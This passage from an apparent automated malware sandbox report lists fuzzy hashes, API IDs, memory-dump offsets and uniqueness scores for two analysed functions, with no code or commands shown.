                                                                                                        • Opcode Fuzzy Hash: 48f53fb3378a577c5bf3fab0995a63ba5b2becd6ac647210b5b50ca1fdddc41b
                                                                                                        • Instruction Fuzzy Hash: DDB1BCB4D113198FDB14DF59C880A9DFBF0BF88304F1585AAD948AB391D334A992CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 03281D08, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.830104608.0000000003280000.00000040.00000010.sdmp, Offset: 03280000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
                                                                                                        • Instruction ID: fb9da9a40dbd5645e2f584fb4ddb46e10bebf19ab08149c4417b1454c5ae699a
                                                                                                        • Opcode Fuzzy Hash: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
                                                                                                        • Instruction Fuzzy Hash: 9541F5B5E1521A9FDB04DF98D490AAEBBF0FF48314F15852DE449AB380D375A881CB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions